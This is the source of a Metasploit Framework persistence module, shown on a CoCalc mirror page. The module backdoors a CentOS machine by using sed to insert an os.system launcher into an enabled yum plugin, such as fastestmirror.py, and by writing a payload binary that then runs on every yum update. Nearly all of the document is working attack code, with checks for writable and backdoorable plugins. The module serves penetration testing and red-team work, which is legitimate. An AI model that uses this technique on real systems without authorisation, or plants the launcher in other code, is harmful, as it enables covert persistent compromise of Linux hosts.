Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/persistence/yum_package_manager.rb
31919 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::EXE

10
  include Msf::Exploit::FileDropper

11
  include Msf::Post::File

12
  include Msf::Post::Linux::System

13
  include Msf::Exploit::Local::Persistence

14
  prepend Msf::Exploit::Remote::AutoCheck

15
  include Msf::Exploit::Deprecated

16
  moved_from 'exploits/linux/local/yum_package_manager_persistence'

17


18
  def initialize(info = {})

19
    super(

20
      update_info(

21
        info,

22
        'Name' => 'Yum Package Manager Persistence',

23
        'Description' => %q{

24
          This module will run a payload when the package manager is used.

25
          This module modifies a yum plugin to launch a binary of choice.

26
          grep -F 'enabled=1' /etc/yum/pluginconf.d/

27
          will show what plugins are currently enabled on the system.

28
          root persmissions are likely required.

29
          Verified on Centos 7.1

30
        },

31
        'License' => MSF_LICENSE,

32
        'Author' => ['Aaron Ringo'],

33
        'Platform' => ['linux', 'unix'],

34
        'Arch' => [

35
          ARCH_CMD,

36
          ARCH_X86,

37
          ARCH_X64,

38
          ARCH_ARMLE,

39
          ARCH_AARCH64,

40
          ARCH_PPC,

41
          ARCH_MIPSLE,

42
          ARCH_MIPSBE

43
        ],

44
        'SessionTypes' => ['shell', 'meterpreter'],

45
        'DisclosureDate' => '2003-12-17', # Date published, Robert G. Browns documentation on Yum

46
        'References' => [

47
          ['URL', 'https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/deployment_guide/sec-yum_plugins'],

48
          ['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION],

49
        ],

50
        'Targets' => [['Automatic', {}]],

51
        'DefaultTarget' => 0,

52
        'Privileged' => true,

53
        'Notes' => {

54
          'Stability' => [CRASH_SAFE],

55
          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],

56
          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]

57
        }

58
      )

59
    )

60


61
    register_options(

62
      [

63
        # /usr/lib/yum-plugins/fastestmirror.py is a default enabled plugin in centos

64
        OptString.new('PLUGIN', [true, 'Yum Plugin to target', 'fastestmirror.py']),

65
        OptString.new('PAYLOAD_NAME', [false, 'Name of binary to write'])

66
      ]

67
    )

68


69
    register_advanced_options(

70
      [

71
        OptString.new('WritableDir', [true, 'A directory where we can write files', '/usr/local/bin/']),

72
        OptString.new('PluginPath', [true, 'Plugin Path to use', '/usr/lib/yum-plugins/'])

73
      ]

74
    )

75
  end

76


77
  def check

78
    return CheckCode::Safe("#{datastore['WritableDir']} does not exist") unless exists? datastore['WritableDir']

79
    return CheckCode::Safe("#{datastore['WritableDir']} not writable") unless writable? datastore['WritableDir']

80


81
    # checks /usr/lib/yum-plugins/PLUGIN.py exists and is writeable

82
    plugin = datastore['PLUGIN']

83
    full_plugin_path = "#{datastore['PluginPath']}#{plugin}"

84
    return CheckCode::Safe("#{full_plugin_path} does not exist") unless exists? full_plugin_path

85
    return CheckCode::Safe("#{full_plugin_path} not writable") unless writable? full_plugin_path

86
    return CheckCode::Safe('yum not found on system') unless command_exists? 'yum'

87
    return CheckCode::Safe('sed not found on system, required for exploitation') unless command_exists? 'sed'

88


89
    # /etc/yum.conf must contain plugins=1 for plugins to run at all

90
    plugins_enabled = cmd_exec "grep -F 'plugins=1' /etc/yum.conf"

91
    return CheckCode::Safe('Plugins are not set to be enabled in /etc/yum.conf') unless plugins_enabled.include? 'plugins=1'

92


93
    vprint_good('Plugins are enabled!')

94


95
    # /etc/yum/pluginconf.d/PLUGIN.conf must contain enabled=1

96
    plugin_conf = "/etc/yum/pluginconf.d/#{plugin.sub('.py', '')}.conf"

97
    plugin_enabled = cmd_exec "grep -F 'enabled=1' #{plugin_conf}"

98
    unless plugin_enabled.include? 'enabled=1'

99
      return CheckCode::Safe("#{plugin_conf} plugin is not configured to run")

100
    end

101


102
    # check that the plugin contains an import os, to backdoor

103
    import_os_check = cmd_exec "grep -F 'import os' #{full_plugin_path}"

104
    unless import_os_check.include? 'import os'

105
      return CheckCode::Safe("#{full_plugin_path} does not import os, which is odd")

106
    end

107


108
    CheckCode::Detected('yum installed and plugin found, enabled, and backdoorable')

109
  end

110


111
  def install_persistence

112
    plugin = datastore['PLUGIN']

113
    full_plugin_path = "#{datastore['PluginPath']}/#{plugin}"

114


115
    # plugins are made in python and generate pycs on successful execution

116
    print_warning('Either Yum has never been executed, or the selected plugin has not run') unless exist? "#{full_plugin_path}c"

117


118
    # check for write in backdoor path and set/generate backdoor name

119
    payload_path = datastore['WritableDir']

120
    payload_path = payload_path.end_with?('/') ? payload_path : "#{payload_path}/"

121
    payload_name = datastore['PAYLOAD_NAME'] || rand_text_alphanumeric(5..10)

122
    payload_path << payload_name

123


124
    # check for sed binary and then append launcher to plugin underneath

125
    print_status('Attempting to modify plugin')

126
    launcher = "os.system('setsid #{payload_path} 2>/dev/null \\& ')"

127
    sed_path = cmd_exec 'command -v sed'

128
    unless sed_path.include?('sed')

129
      fail_with Failure::NotVulnerable, 'Module uses sed to modify plugin, sed was not found'

130
    end

131
    sed_line = "#{sed_path} -ie \"/import os/ a #{launcher}\" #{full_plugin_path}"

132
    cmd_exec sed_line

133


134
    # actually write users payload to be executed then check for write

135
    if payload.arch.first == 'cmd'

136
      write_file(payload_path, payload.encoded)

137
    else

138
      write_file(payload_path, generate_payload_exe)

139
    end

140
    @clean_up_rc << "rm #{payload_path}\n"

141
    @clean_up_rc << "execute -f #{sed_path} -a \"-i /os\.system.*#{payload_name}/d #{full_plugin_path}\""

142
    unless exist? payload_path

143
      fail_with Failure::Unknown, "Failed to write #{payload_path}"

144
    end

145


146
    # change perms to reflect bins in /usr/local/bin/, give good feels

147
    chmod(payload_path, 0o755)

148
    print_status("Backdoor uploaded to #{payload_path}")

149
    print_good('Backdoor will run on next Yum update')

150
  end

151
end

152


153